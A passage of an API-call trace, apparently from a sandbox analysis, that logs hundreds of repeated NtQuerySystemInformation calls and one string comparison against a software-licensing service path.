ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec20, Length=0x20, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec20, Length=0x20, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee60, Length=0x28, ResultLength=0x0) [0240.545] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x28, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x28, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x28, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x28, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x28, ResultLength=0x0) [0240.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x28, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x20, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x20, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x20, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x20, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x20, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec20, Length=0x20, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec20, Length=0x20, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x50, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x50, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x50, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x50, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x50, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x50, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x50, ResultLength=0x0) [0240.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8c0, Length=0x28, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e930, Length=0x28, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9b0, Length=0x28, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9b0, Length=0x28, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e850, Length=0x20, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x20, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x20, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x20, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea90, Length=0x38, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e910, Length=0x20, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x20, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x20, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb90, Length=0x28, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x20, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x20, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x50, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x50, ResultLength=0x0) [0240.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x28, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb90, Length=0x28, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x38, ResultLength=0x0) [0240.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.581] NtQuerySystemInformation (SystemInformationClass=0xb9, 